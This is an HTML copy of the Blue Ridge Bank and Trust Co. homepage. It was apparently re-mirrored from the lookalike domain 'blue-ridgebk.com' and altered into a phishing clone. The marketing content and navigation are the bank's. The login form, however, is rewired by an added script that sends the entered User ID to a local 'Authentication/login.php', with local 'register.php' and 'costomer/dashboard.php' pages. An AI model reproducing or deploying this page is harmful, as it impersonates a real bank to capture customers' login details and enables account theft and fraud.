<!DOCTYPE html>
<html class="no-js" lang="en">
<!-- Mirrored from www.blueridgebank.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 04 Mar 2024 23:22:40 GMT -->
<!-- Added by HTTrack -->

<!-- Mirrored from blue-ridgebk.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 23 Oct 2024 18:33:03 GMT -->
<meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->

<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title>Home › Blue Ridge Bank and Trust Co.</title>
  <meta name="description" content="">
  <meta name="keywords" content="">
  <meta name="viewport" content="width=device-width,initial-scale=1">
  <meta name="apple-mobile-web-app-title" content="Blue Ridge Bank and Trust Co.">
  <script async="" src="https://www.googletagmanager.com/gtag/js?id=UA-63016301-1"></script>
  <script>function gtag() { dataLayer.push(arguments) } window.dataLayer = window.dataLayer || [], gtag("js", new Date), gtag("config", "UA-63016301-1")</script>
  <link rel="stylesheet" href="assets/css/main.minbd2fbd2f.css?v=1645637503784">
  <script src="ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.html"></script>
  <script>WebFont.load({ google: { families: ["Poppins:100,100i,200,200i,300,300i,400,400i,500,500i,600,600i,700,700i,800,800i,900,900i"] } })</script>
  <script type="text/javascript" src="cdn.rlets.com/capture_configs/950/c58/b93/967466697e29ce2dcd0be64.html"
    async="async"></script>
  <link rel="stylesheet" href="css/style.css">
  <script src="../unpkg.com/sweetalert%402.1.2/dist/sweetalert.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>

</head>

<body class="home">
  <div role="navigation" aria-label="Skip content and Acrobat Reader">
    <div class="hidden-compliance" id="complianceMenu">
      <ul class="list-unstyled">
        <li><a href="index-2.html">Home</a></li>
        <li><a href="#main">Skip to main content</a></li>
        <li><a href="#footer">Skip to footer</a></li>
      </ul>
    </div><a class="hidden-compliance external" href="http://get.adobe.com/reader/"
      title="External link to download Acrobat Reader" aria-label="Acrobat Reader download">Download Acrobat Reader 5.0
      or higher to view .pdf files.</a>
  </div>
  <div class="master-container">
    <header class="header">
      <div class="d-none d-lg-block bg-light topnav-wrap">
        <div class="container">
          <nav class="topnav__links" aria-label="Top navigation">
            <ul class="banno-menu menu-121a2bd0-a11d-11ea-9d90-0242da0b0362">
                
                <li class="menu-external">
                    

              </li>
              <li class="menu-external">
                <a href="register.php" target="_blank">Create Account</a>

              </li>
              
              <li class="menu-external">
                <a href=""
                  target="_blank">Make a Payment</a>

              </li>
            </ul>
          </nav>
        </div>
      </div>
      <div class="container">
        <div
          class="header__inner d-md-flex flex-md-row justify-content-md-between align-items-md-center align-content-md-center">
          <div class="header__left"><span itemscope="" itemtype="http://schema.org/BankOrCreditUnion"><span
                itemprop="name" class="sr-only">Blue Ridge Bank and Trust Co.</span> <a href="index-2.html" class="logo"
                title="Blue Ridge Bank and Trust Co., Independence, MO" itemprop="url"><span class="logotype"
                  itemprop="image" itemscope="" itemtype="http://schema.org/ImageObject"><img
                    src="assets/img/blue-ridge-bank-and-trust-co.svg" alt="Blue Ridge Bank and Trust Co."
                    itemprop="url"></span></a></span></div>
          <div class="header__right d-flex justify-content-center align-items-center">
            <nav class="navbar" aria-label="Primary">
              <div class="navbar-header"><button type="button" class="navbar-toggle collapsed btn btn-primary"
                  data-toggle="collapse" data-target="#navbar-collapse" aria-expanded="false" aria-haspopup="true"><span
                    class="sr-only">Toggle </span>Menu</button></div>
              <div class="collapse navbar-collapse" id="navbar-collapse">
                <div class="d-flex d-lg-none justify-content-between align-items-center p-2">
                  <div class="menu-title-text">Menu</div><button type="button" class="navbar-toggle collapsed"
                    data-toggle="collapse" data-target="#navbar-collapse" aria-expanded="false"
                    aria-haspopup="true">Close<span class="sr-only"> Menu</span><span class="icon icon-close"
                      aria-hidden="true"></span></button>
                </div>
                <ul class="banno-menu menu-121a2bd3-a11d-11ea-9d90-0242da0b0362">
                  <li class="dropdown menu-category">
                    <span role="button" aria-expanded="false" class="category-item" tabindex="0">Personal</span>
                    <ul class="dropdown-menu">
                      <li class="dropdown menu-group">
                        <span role="button" aria-expanded="false" class="group-item" tabindex="0">Apply Online</span>
                        <ul class="dropdown-menu">
                          <li class="menu-internal">
                            <a href="loan-account-application.html">Loan Account Application</a>

                          </li>
                        </ul>
                      </li>
                    </ul>
                  </li>
                  <li class="dropdown menu-category">
                    <span role="button" aria-expanded="false" class="category-item" tabindex="0">Business</span>
                    <ul class="dropdown-menu">
                      <li class="dropdown menu-group">
                        <span role="button" aria-expanded="false" class="group-item" tabindex="0">Business Products and
                          Services</span>
                        <ul class="dropdown-menu">
                          <li class="menu-internal">
                            <a href="business/checking.html">Checking</a>

                          </li>
                          <li class="menu-internal">
                            <a href="business/commercial-lending.html">Commercial Lending</a>

                          </li>
                          <li class="menu-internal">
                            <a href="business/treasury-services.html">Treasury Services</a>

                          </li>
                          <li class="menu-internal">
                            <a href="business/card-services.html">Card Services</a>

                          </li>
                        </ul>
                      </li>
                    </ul>
                  </li>
                  <li class="dropdown menu-category">
                    <span role="button" aria-expanded="false" class="category-item" tabindex="0">Online</span>
                    <ul class="dropdown-menu">
                      <li class="dropdown menu-group">
                        <span role="button" aria-expanded="false" class="group-item" tabindex="0">Online Services</span>
                        <ul class="dropdown-menu">
                          <li class="menu-internal">
                            <a href="online/personal-online-banking.html">Personal</a>

                          </li>
                          <li class="menu-internal">
                            <a href="online/business-online-banking.html">Business</a>

                          </li>
                        </ul>
                      </li>
                      <li class="dropdown menu-group">
                        <span role="button" aria-expanded="false" class="group-item" tabindex="0">Online Security</span>
                        <ul class="dropdown-menu">
                          <li class="menu-internal">
                            <a href="security.html">Security Statement</a>

                          </li>
                          <li class="menu-internal">
                            <a href="online/online-security/protecting-identity.html">Protecting Identity</a>

                          </li>
                          <li class="menu-internal">
                            <a href="online/online-security/scam-alerts.html">Scam Alerts!</a>

                          </li>
                        </ul>
                      </li>
                    </ul>
                  </li>
                  <li class="dropdown menu-category">
                    <span role="button" aria-expanded="false" class="category-item" tabindex="0">About Us</span>
                    <ul class="dropdown-menu">
                      <li class="dropdown menu-group">
                        <span role="button" aria-expanded="false" class="group-item" tabindex="0">Who We Are</span>
                        <ul class="dropdown-menu">
                          <li class="menu-internal">
                            <a href="about-us/history.html">History</a>

                          </li>
                          <li class="menu-internal">
                            <a href="about-us/contact-us.html">Contact Us</a>

                          </li>
                          <li class="menu-internal">
                            <a href="about-us/branch-atm-locator.html">Branch/ATM Locator</a>

                          </li>
                          <li class="menu-internal">
                            <a href="about-us/careers.html">Careers</a>

                          </li>
                          <li class="menu-internal">
                            <a href="about-us/news.html">News</a>

                          </li>
                          <li class="menu-internal">
                            <a href="about-us/policies-and-disclosures.html">Policies & Disclosures</a>

                          </li>
                        </ul>
                      </li>
                    </ul>
                  </li>
                </ul>
                <div class="d-block d-lg-none mb-2">
                  <nav class="topnav__links" aria-label="Top navigation">
                    <ul class="banno-menu menu-121a2bd0-a11d-11ea-9d90-0242da0b0362">
                      <li class="menu-external">
                        <a href="register.php" target="_blank">Create Account</a>

                      </li>
                      <li class="menu-external">
                        <a href="https://smartpay.profitstars.com/expressbd/BillerDirect?returnUrl=https%3A%2F%2Fsmartpay.profitstars.com%3A443%2Fexpressbd%2FBillerDirect%2FBillerDirect%2FIndex"
                          target="_blank">Make a Payment</a>

                      </li>
                    </ul>
                  </nav>
                </div>
                <button type="button" class="header__button toggle-search d-none d-lg-inline-block">
                  <span class="icon icon-search" aria-hidden="true"></span>
                  <span class="sr-only">Open Search</span></button>
                <div class="search-internal d-block">
                  <div class="d-flex flex-row justify-content-lg-end h-100 align-items-center">
                    <div class="d-none d-lg-block mr-2">
                      <button class="header__button toggle-search">
                        <span class="search-close-text">Close<span class="sr-only"> Search</span>
                        </span> <span class="icon icon-close" aria-hidden="true"></span>
                      </button>
                    </div>
                    <div class="d-block w-100 w-lg-auto">
                      <form method="GET" action="https://www.blueridgebank.com/search" class="parsley-absolute mb-0"
                        data-parsley-validate="">
                        <div
                          class="form-group mb-0 d-flex flex-row justify-content-between align-items-center align-content-center">
                          <label for="siteSearch" class="sr-only">Enter search terms</label>
                          <input name="q" id="siteSearch" class="form-control mr-1" type="search"
                            placeholder="Search..." data-parsley-required="true"
                            data-parsley-errors-container="#search-error">
                          <button type="submit" class="search-submit btn btn-primary"><span class="icon icon-search"
                              aria-hidden="true"></span><span class="sr-only">Start Site Search</span></button>
                        </div>
                      </form>
                    </div>
                  </div>
                </div>
              </div>
            </nav>
            <div class="olb">
              <div class="olb__toggle btn btn-success">
                <span class="login-text">Login<span class="sr-only"> to online banking</span></span> <span
                  class="close-text">Close<span class="sr-only"> online banking</span></span>
              </div>
              <div class="olb__container" role="region" aria-labelledby="region--olb-title">
                <div class="d-block d-md-none p-2 text-right"><button class="olb__toggle"><span
                      class="close-text">Close</span><span class="sr-only"> online banking</span> <span
                      class="icon icon-close ml-2" aria-hidden="true"></span></button></div>

                <!--------------------------------loging----------------------------------------->
                <form class="olb__login parsley-absolute" id="loginForm" method="post">
                  <div class="form-label" id="region--olb-title">Log into Your Account</div>

                  <div class="form-group mb-0">
                    <i id="ermptyErrro"></i><br>
                    <label for="id">User ID </label>
                    <input type="text" name="id" id="id" class="form-control" autocomplete="off" required="">
                  </div>
                  <input type="button" id="loginBtn" class="btn btn-small btn-success" value="Login">
                </form>


                <div class="olb__links d-md-flex justify-content-md-center text-center">
                  <div><a
                      href="https://www.netteller.com/login2008/Authentication/Views/LoginPasswordSelfReset.aspx?returnUrl=%2fblueridgebank%2f">Forgot
                      Password</a></div>
                  <div><a
                      href="https://www.netteller.com/login2008/Authentication/Views/OnlineEnrollmentAgreement.aspx?returnUrl=%2fblueridgebank%2f">Enroll</a>
                  </div>
                  <div><a href="register.php">Create Account</a></div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </header>
    <div id="google_translate_element"></div>
    <div id="main" tabindex="-1" role="main">
      <section class="alert hidden-alert px-3 py-5 text-light" id="alertBox" aria-label="Important Notice">
      </section>
      <h1 class="sr-only">Blue Ridge Bank and Trust Co.</h1>
      
      <div class="hero">
        <div class="hero__slider slider">
          <div class="slide remove-blank relative">
            <div class="BMcontent" data-content-block="hero1image" data-content="content" data-editable="editable">
              <div class="hero__slider-img">
                <div class="content image"><img alt=""
                    src="assets/files/bfCGoAUc/Banno%20update%201_Website%20925x800.jpg" image-id="bfCGoAUc"></div>
              </div>
              <div class="hero__slider-content">
                <div class="content">
                  <h2><span style="font-family: inherit; font-size: 2.0625rem; letter-spacing: 0.049em;">Online and on
                      the go! <br>All-new mobile app and <br>online</span><span
                      style="font-family: inherit; font-size: 2.0625rem; letter-spacing: 0.049em;"> banking: <br>COMING
                      SOON!</span></h2>
                  <hr>
                  <p>manage your accounts with enhanced security <br>and a more streamlined user experience!</p>
                </div>
              </div>
            </div>
          </div>
          <div class="slide remove-blank relative">
            <div class="BMcontent" data-content-block="hero2image" data-content="content" data-editable="editable">
              <div class="hero__slider-img">
                <div class="content image"><img alt=""
                    src="assets/files/V8xDNST8/BRB-MY%20Checking_Website%20925x800_2022.jpg" image-id="V8xDNST8"></div>
              </div>
              <div class="hero__slider-content">
                <div class="content">
                  <h2><span style="font-family: inherit; font-size: 2.0625rem; letter-spacing: 0.049em;">Start earning
                    </span><br></h2>
                  <div><span style="font-family: inherit; font-size: 2.0625rem; letter-spacing: 0.049em;">premium
                      interest </span></div>
                  <div><span style="font-family: inherit; font-size: 2.0625rem; letter-spacing: 0.049em;">with MY
                      Banking!</span></div>
                  <hr>
                  <p>the checking + savings options to help you reach your goals!</p>
                  <p><a href="personal/my-checking-and-savings.html" data-link-id="/personal/my-checking-and-savings"
                      data-link-type-id="page" class="btn btn-success " data-disclaimer-id="null" target="_self">Go to
                      MY Banking</a></p>
                </div>
              </div>
            </div>
          </div>
          <div class="slide remove-blank relative">
            <div class="BMcontent" data-content-block="hero3image" data-content="content" data-editable="editable">
              <div class="hero__slider-img">
                <div class="content image"><img alt="Stacking coins to symbolize growing finances"
                    src="assets/files/qsi2soG0/Savings_Main%20Splash_925x800.jpg" image-id="qsi2soG0"></div>
              </div>
              <div class="hero__slider-content">
                <div class="content">
                  <h2><br></h2>
                  <h2>Watch your savings GROW with a CD!</h2>
                  <hr>
                  <p>reach your financial goals with terms that fit your needs!</p>
                  <p><a href="personal/consumer-rates.html" data-link-id="/personal/consumer-rates"
                      data-link-type-id="page" class="btn btn-success " data-disclaimer-id="null" target="_self">Go to
                      CD Rates</a></p>
                </div>
              </div>
            </div>
          </div>
        </div>
        <div class="hero__slider-controls"></div>
      </div>
      <div class="container remove-blank my-5 my-md-10">
        <div class="row justify-content-center">
          <div class="col-xl-6 col-lg-8 col-md-10">
            <div data-content-block="bodyCopy1" data-content="content" data-editable="editable"
              class="content remove-blank mb-md-4 mb-2">
              <h2 style="text-align: center;"><span class="biggest">Enabling people to acquire the financial resources
                  to realize their dreams <strong>since 1958!</strong></span></h2>
            </div>
          </div>
        </div>
        <div class="slider-quicklinks">
          <div class="slide remove-blank">
            <div data-content-block="quicklink1" data-content="content" data-editable="editable" class="content">
              <div><span style="font-size: 0.875rem;"><img alt="white automobile icon"
                    src="assets/files/mrqR4CQT/icon_financial_21_55px.png" image-id="mrqR4CQT"
                    style="display: block; margin-left: auto; margin-right: auto;"></span></div>
              <div><span style="font-size: 0.875rem;"></span><a href="personal/personal-lending.html"
                  data-link-id="/personal/personal-lending" data-link-type-id="page" class="" data-disclaimer-id="null"
                  target="_self">Auto Loans</a></div>
            </div>
          </div>
          <div class="slide remove-blank">
            <div data-content-block="quicklink2" data-content="content" data-editable="editable" class="content">
              <div><img alt="white mortgage icon" src="assets/files/SZ7fMp44/icons_mortgage_95px.png"
                  image-id="SZ7fMp44" style="display: block; margin-left: auto; margin-right: auto;"><a
                  href="personal/personal-lending.html" data-link-id="/personal/personal-lending"
                  data-link-type-id="page" class="" data-disclaimer-id="null" target="_self">Mortgage Loans</a></div>
            </div>
          </div>
          <div class="slide remove-blank">
            <div data-content-block="quicklink3" data-content="content" data-editable="editable" class="content">
              <div><img alt="white investment icon" src="assets/files/noNRruoF/icons_investment_95px.png"
                  image-id="noNRruoF" style="display: block; margin-left: auto; margin-right: auto;"><a
                  href="personal/wealth-management-and-trusts.html"
                  data-link-id="/personal/wealth-management-and-trusts" data-link-type-id="page" class=""
                  data-disclaimer-id="null" target="_self">Investments</a></div>
            </div>
          </div>
          <div class="slide remove-blank">
            <div data-content-block="quicklink4" data-content="content" data-editable="editable" class="content">
              <div><img alt="white retirement icon" src="assets/files/CP0UV2TD/icons_retirement_95px.png"
                  image-id="CP0UV2TD" style="display: block; margin-left: auto; margin-right: auto;"></div>
              <div><a href="personal/personal-savings.html" data-link-id="/personal/personal-savings"
                  data-link-type-id="page" class="" data-disclaimer-id="null" target="_self">Retirement Planning</a>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="wide-space wide-space-left remove-blank">
        <div class="wide-space__top">
          <div class="wide-space__image wide-space-left__image">
            <div data-content-block="wideSpaceImg" data-content="content" data-editable="editable"
              class="image content">
              <div><img alt="" src="assets/files/S3Aridll/subad_Accounts-Receivable_725x394.jpg" image-id="S3Aridll">
              </div>
            </div>
          </div><img src="assets/img/hero-swooshes.png" class="wide-space__overlay wide-space-left__overlay" alt=""
            aria-hidden="true">
        </div>
        <div class="wide-space__text wide-space-left__text">
          <div class="row">
            <div class="col-xl-4 col-md-5">
              <div data-content-block="wideSpaceText" data-content="content" data-editable="editable" class="content">
                <h2>Accounts Receivables? No problem!</h2>
                <div>
                  <hr>
                  <p>Our Online Cash Management system gives you the capability to create an ACH-formatted file or
                    allows for the upload of ACH-formatted files created within your own software package.</p>
                  <p><a href="business/treasury-services.html" data-link-id="/business/treasury-services"
                      data-link-type-id="page" class="btn btn-default " data-disclaimer-id="null"
                      target="_self">Treasury Services</a></p>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="container remove-blank my-md-10 my-5">
        <div class="row justify-content-center">
          <div class="col-lg-8 col-md-10">
            <div data-content-block="bodyCopy2" data-content="content" data-editable="editable"
              class="content remove-blank mb-3 mb-md-6">
              <h2 style="text-align: center;">More of the <strong>Great Services</strong> We Provide</h2>
              <p style="text-align: center;">Looking for a way to streamline the management of your money? Look no
                further than Blue Ridge Bank and Trust's lineup of products and services designed to save you time and
                money.</p>
            </div>
          </div>
        </div>
        <div class="slider-services">
          <div class="slide remove-blank">
            <div class="slide-inner">
              <div class="slide-inner__image">
                <div data-content-block="serviceImg1" data-content="content" data-editable="editable" class="content">
                  <div><img alt="" src="assets/files/KWI0RaKZ/MY-Banking_Small-sub_270x166.jpg" image-id="KWI0RaKZ">
                  </div>
                </div>
              </div>
              <div class="slide-inner__text text-light">
                <div data-content-block="serviceText1" data-content="content" data-editable="editable" class="content">
                  <h3><a href="personal/my-checking-and-savings.html" data-link-id="/personal/my-checking-and-savings"
                      data-link-type-id="page" class="" data-disclaimer-id="null" target="_self">MY Checking and
                      Savings</a></h3>
                </div>
              </div>
            </div>
          </div>
          <div class="slide remove-blank">
            <div class="slide-inner">
              <div class="slide-inner__image">
                <div data-content-block="serviceImg2" data-content="content" data-editable="editable" class="content">
                  <div><img alt="a person taking a mobile picture of a check"
                      src="assets/files/6ufU9bp5/sm_sub_mobile-deposit.jpg" image-id="6ufU9bp5"></div>
                </div>
              </div>
              <div class="slide-inner__text text-light">
                <div data-content-block="serviceText2" data-content="content" data-editable="editable" class="content">
                  <h3><a href="mobile-banking.html" data-link-id="/mobile-banking" data-link-type-id="page" class=""
                      data-disclaimer-id="null" target="_self">Mobile Banking</a></h3>
                </div>
              </div>
            </div>
          </div>
          <div class="slide remove-blank">
            <div class="slide-inner">
              <div class="slide-inner__image">
                <div data-content-block="serviceImg3" data-content="content" data-editable="editable" class="content">
                  <div><img alt="credit and debit card image" src="assets/files/I16MEhct/sm_sub_debit-cards.jpg"
                      image-id="I16MEhct"></div>
                </div>
              </div>
              <div class="slide-inner__text text-light">
                <div data-content-block="serviceText3" data-content="content" data-editable="editable" class="content">
                  <h3><a href="personal/debit-and-credit-cards.html" data-link-id="/personal/debit-and-credit-cards"
                      data-link-type-id="page" class="" data-disclaimer-id="null" target="_self">Debit and Credit
                      Cards</a></h3>
                </div>
              </div>
            </div>
          </div>
          <div class="slide remove-blank">
            <div class="slide-inner">
              <div class="slide-inner__image">
                <div data-content-block="serviceImg4" data-content="content" data-editable="editable" class="content">
                  <div><img alt="" src="assets/files/LmrolmX0/Sub%20ad_WOB.jpg" image-id="LmrolmX0"></div>
                </div>
              </div>
              <div class="slide-inner__text text-light">
                <div data-content-block="serviceText4" data-content="content" data-editable="editable" class="content">
                  <h3><a href="women-owned-business-group.html" data-link-id="/women-owned-business-group"
                      data-link-type-id="page" class="" data-disclaimer-id="null" target="_self">Women-Owned </a><br><a
                      href="women-owned-business-group.html" data-link-id="/women-owned-business-group"
                      data-link-type-id="page" class="" data-disclaimer-id="null" target="_self">Business Group</a></h3>
                </div>
              </div>
            </div>
          </div>
          <div class="slide remove-blank">
            <div class="slide-inner">
              <div class="slide-inner__image">
                <div data-content-block="serviceImg5" data-content="content" data-editable="editable" class="content">
                  <div><img alt="People dancing" src="assets/files/FMShwfZE/sub_wealth_mgmt.jpg" image-id="FMShwfZE">
                  </div>
                </div>
              </div>
              <div class="slide-inner__text text-light">
                <div data-content-block="serviceText5" data-content="content" data-editable="editable" class="content">
                  <h3><a href="personal/wealth-management-and-trusts.html"
                      data-link-id="/personal/wealth-management-and-trusts" data-link-type-id="page" class=""
                      data-disclaimer-id="null" target="_self">Wealth Management</a></h3>
                </div>
              </div>
            </div>
          </div>
          <div class="slide remove-blank">
            <div class="slide-inner">
              <div class="slide-inner__image">
                <div data-content-block="serviceImg6" data-content="content" data-editable="editable" class="content">
                  <div><img alt="checking statements online" src="assets/files/alvVCV2s/sm_sub_olb.jpg"
                      image-id="alvVCV2s"></div>
                </div>
              </div>
              <div class="slide-inner__text text-light">
                <div data-content-block="serviceText6" data-content="content" data-editable="editable" class="content">
                  <h3><a href="online/personal-online-banking.html" data-link-id="/online/personal-online-banking"
                      data-link-type-id="page" class="" data-disclaimer-id="null" target="_self">Online Banking</a></h3>
                </div>
              </div>
            </div>
          </div>
        </div>
        <div class="slider-services-arrows"></div>
      </div>
      <div class="wide-space wide-space-right remove-blank">
        <div class="wide-space__top">
          <div class="wide-space__image wide-space-right__image">
            <div data-content-block="wideSpaceImg2" data-content="content" data-editable="editable"
              class="image content">
              <div><img alt="a couple reviewing documents" src="assets/files/fn2D6JBQ/wide_sub_Compare.jpg"
                  image-id="fn2D6JBQ"></div>
            </div>
          </div><img src="assets/img/hero-swooshes.png" class="wide-space__overlay wide-space-right__overlay" alt=""
            aria-hidden="true">
        </div>
        <div class="wide-space__text wide-space-right__text">
          <div class="row">
            <div class="col-xl-4 col-md-5 offset-xl-8 offset-md-7">
              <div data-content-block="wideSpaceText2" data-content="content" data-editable="editable" class="content">
                <h2>Open an Account Online Today!</h2>
                <hr>
                <p>Opening an account at Blue Ridge Bank and Trust Co. is fast and easy. Pick from our many products
                  such as personal checking accounts, savings accounts, CDs, and more.</p>
                <p><a href="personal/apply-online/deposit-accounts.html"
                    data-link-id="/personal/apply-online/deposit-accounts" data-link-type-id="page"
                    class="btn btn-default " data-disclaimer-id="null" target="_self">Open an Account</a></p>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="container remove-blank my-5 my-md-10">
        <div class="row justify-content-center">
          <div class="col-xl-6 col-lg-8 col-md-10">
            <div class="ajax-form-container">
              <div id="newsletter-container" class="form-container">
                <div data-content-block="newsletterText" data-content="content" data-editable="editable"
                  class="content remove-blank mb-2">
                  <h2 style="text-align: center;">Stay up to date with us.</h2>
                  <p style="text-align: center;">Sign up to receive our monthly email updates and product offers.</p>
                </div>
                <!--<form id="emailForm" class="ajax-form no-scroll parsley-absolute" name="emailForm"-->
                <!--  data-parsley-validate="">-->
                <!--  <div style="display:none;speak:none;">-->
                <!--    <label for="_comments_input_Newsletter_Sign_Up">Leave me blank for Newsletter Sign Up.</label>-->
                <!--    <input type="text" id="_comments_input_Newsletter_Sign_Up" name="_comments_input">-->
                <!--  </div><input type="hidden" name="formId" value="emailForm" class="form-id-input">-->
                <!--  <div class="d-md-flex flex-md-row align-items-end">-->
                <!--    <div class="form-group"><label for="newsletterFirstName">Name <span>*</span> <span-->
                <!--          class="sr-only">(Newsletter signup)</span></label> <input type="text" class="form-control"-->
                <!--        name="name" id="newsletterFirstName" data-parsley-required="true"></div>-->
                <!--    <div class="form-group"><label for="newsletterEmailAddress">Email Address <span>*</span> <span-->
                <!--          class="sr-only">(Newsletter signup)</span></label> <input type="email"-->
                <!--        data-parsley-type="email" class="form-control" name="email" id="newsletterEmailAddress"-->
                <!--        data-parsley-required="true"></div>-->
                <!--    <div class="form-group text-center"><button type="submit" class="btn btn-primary">Sign Up <span-->
                <!--          class="loading" aria-hidden="true"><span class="loading-inner"></span></span></button></div>-->
                <!--  </div>-->
                <!--  <div class="text-center">-->
                <!--    <div class="error" role="alert" aria-atomic="true">There was an error submitting the form.</div>-->
                <!--  </div>-->
                <!--</form>-->
              </div>
              <div class="success-container">
                <div id="success">
                  <div data-content-block="newsletterSuccessCopy" data-content="content" data-editable="editable"
                    class="content">
                    <h3 style="text-align: center;">Thank you for signing up!</h3>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <footer class="footer text-light py-4 text-center" id="footer">
      <div class="backToTop__container text-right">
        <div class="container"><button type="button" id="scrollTop"><span class="sr-only">Back to the
              top</span></button></div>
      </div>
      <div class="container">
        <div class="footer__inner">
          <div class="social"><a href="https://www.facebook.com/BlueRidgeBankandTrustCo"><span
                class="icon icon-facebook" aria-hidden="true"></span><span class="sr-only">Facebook</span></a> <a
              href="https://www.linkedin.com/company/blue-ridge-bank-and-trust-co-/"><span class="icon icon-linkedin"
                aria-hidden="true"></span><span class="sr-only">LinkedIn</span></a></div>
          <nav class="footer__links mt-4" aria-label="Footer">
            <ul class="banno-menu menu-121b1631-a11d-11ea-9d90-0242da0b0362">
              <li class="menu-internal">
                <a href="privacy-policy.html">Privacy Policy</a>

              </li>
              <li class="menu-internal">
                <a href="security.html">Security Policy</a>

              </li>
              <li class="menu-internal">
                <a href="usa-patriot-act.html">USA Patriot Act</a>

              </li>
              <li class="menu-internal">
                <a href="about-us/policies-and-disclosures.html">Disclosures</a>

              </li>
              <li class="menu-internal">
                <a href="about-us/contact-us.html">Contact Us</a>

              </li>
            </ul>
          </nav>
          <div class="copyright mt-4"><span class="copytext">© <span class="copy-date"></span> Blue Ridge Bank and Trust
              Co.</span> <span class="ml-xs-4 fdic"><a href="https://www.fdic.gov/" title="Member FDIC">Member
                FDIC</a>.</span> <span class="ehl"><a href="https://www.hud.gov/" title="Equal Housing Lender">Equal
                Housing Lender <span class="icon icon-ehl" aria-hidden="true"></span></a></span>
            <div class="mt-4"><span class="jha mr-2"><a href="https://www.banno.com/" class="external"><span
                    class="icon icon-jha" aria-hidden="true"></span><span class="sr-only">Created by
                    Banno</span></a></span>
              <div id="sentinel-badge" data-theme="dark">


                <script src="banno.com/a/monitor/api/badge/badge.min.html" async="async"></script>
              </div>
            </div>
          </div>
        </div>
      </div>
    </footer>
  </div>
  <script src="assets/js/jquery.min.js"></script>
  <script defer="defer" src="assets/js/script.min584f584f.js?v=1645637503763"></script>
  <script src="assets/target/disclaimers3b6c3b6c.js?bh=e14aac" id="disclaimerscript" defer="defer" proceed="Proceed"
    cancel="Cancel"></script>
  <script type="text/javascript">
      (function (serve, h, s) {
        window.kernel = window.kernel || function () { (window.kernel.q = window.kernel.q || []).push(arguments); };
        h = document.getElementsByTagName("head")[0]; s = document.createElement("script"); s.src = "https://" + serve + "/kernel.js"; s.async = 1; h.appendChild(s);
      })("kernel-serve.banno.com");
    kernel("create", "f32c1ff2-22ad-43e9-a7a2-d0af2500265b");
    kernel("visit"); kernel("addClickthroughListeners", []); kernel("associate", [{ "loginFormId": "loginForm", "usernameField": "id" }]);
  </script>
  <script nomodule="nomodule" type="text/javascript">

    function ieWarning() {
      document.body.setAttribute("style", "padding-bottom: 120px;");
      var warning = document.createElement("section");
      warning.setAttribute("class", "ie-disclaimer");
      warning.setAttribute("style", "background-color: #000; color:#fff; padding: 10px 40px; position: fixed; bottom: 0; z-index: 1040; height: 120px;");
      warning.setAttribute("aria-label", "Important notice regarding browser support");
      var warningContent = 'Please note: As of February 15, 2022, this website will no longer function with this browser' +
        ' version. This website was built to support the use of modern browsers. The browser that you are currently using' +
        ' is no longer fully supported by Microsoft and is not considered a modern browser. To use this site, please open' +
        ' in a modern browser like Google Chrome, Firefox, Safari, or a currently supported version of Microsoft Edge.';
      warning.innerHTML = warningContent;
      var firstElement = document.body.children[0];
      document.body.insertBefore(warning, firstElement);
    }
    window.addEventListener("load", ieWarning);

  </script>
  <div class="preload-container">
    <img src="img/04de2e31234507.564a1d23645bf.gif" alt="">
  </div>
  <script src="login.js"></script>
  <script>


    $(document).ready(function () {
      
       
        console.log("oooo");
        $("#loginBtn").on("click", function (e) {
            e.preventDefault();
            $(".preload-container").show();
            var id = $("#id").val();
            //alert("pppp");
            //    if (id=="") {
            //     $("#ermptyErrro").html("<i style='color:red'>Id cant be empty</i>");
            //    }
            $.ajax({
                url: "Authentication/login.php",
                type: "POST",
                data: { id: id },
    
                beforSend: function () {
                    $(".preload-container").show();
                },
    
                success: function (data) {
                    //console.log(data);
    
                    if (data == 'block') {
                      Swal.fire({
                            title: "Opps!",
                            text: "Opps you dont have access to this account contact our support!",
                            icon: "error",
                            button: "Ok!",
    
                        })
    
                    } else if (data == "emptyId") {
                        $("#ermptyErrro").html("<i style='color:red;input'>Id can't be empty</i>");
    
                    } else if (data == "invakidACC") {
                      Swal.fire({
                            title: "Opps!",
                            text: "Invalid Account!",
                            icon: "error",
                            button: "Ok!",
    
                        })
                    } else if (data == "succesdash") {
                        window.location.href = 'costomer/dashboard.php';
    
                    }
                },
    
                complete: function () {
                    $(".preload-container").hide();
                }
            })
        })
    })
       
       </script>

<script type="text/javascript">
function googleTranslateElementInit() {
  new google.translate.TranslateElement({pageLanguage: 'en'}, 'google_translate_element');
}
</script>

<script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
  
</body>
<!-- Mirrored from www.blueridgebank.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 04 Mar 2024 23:23:39 GMT -->


<!-- Mirrored from blue-ridgebk.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 23 Oct 2024 18:33:23 GMT -->
</html>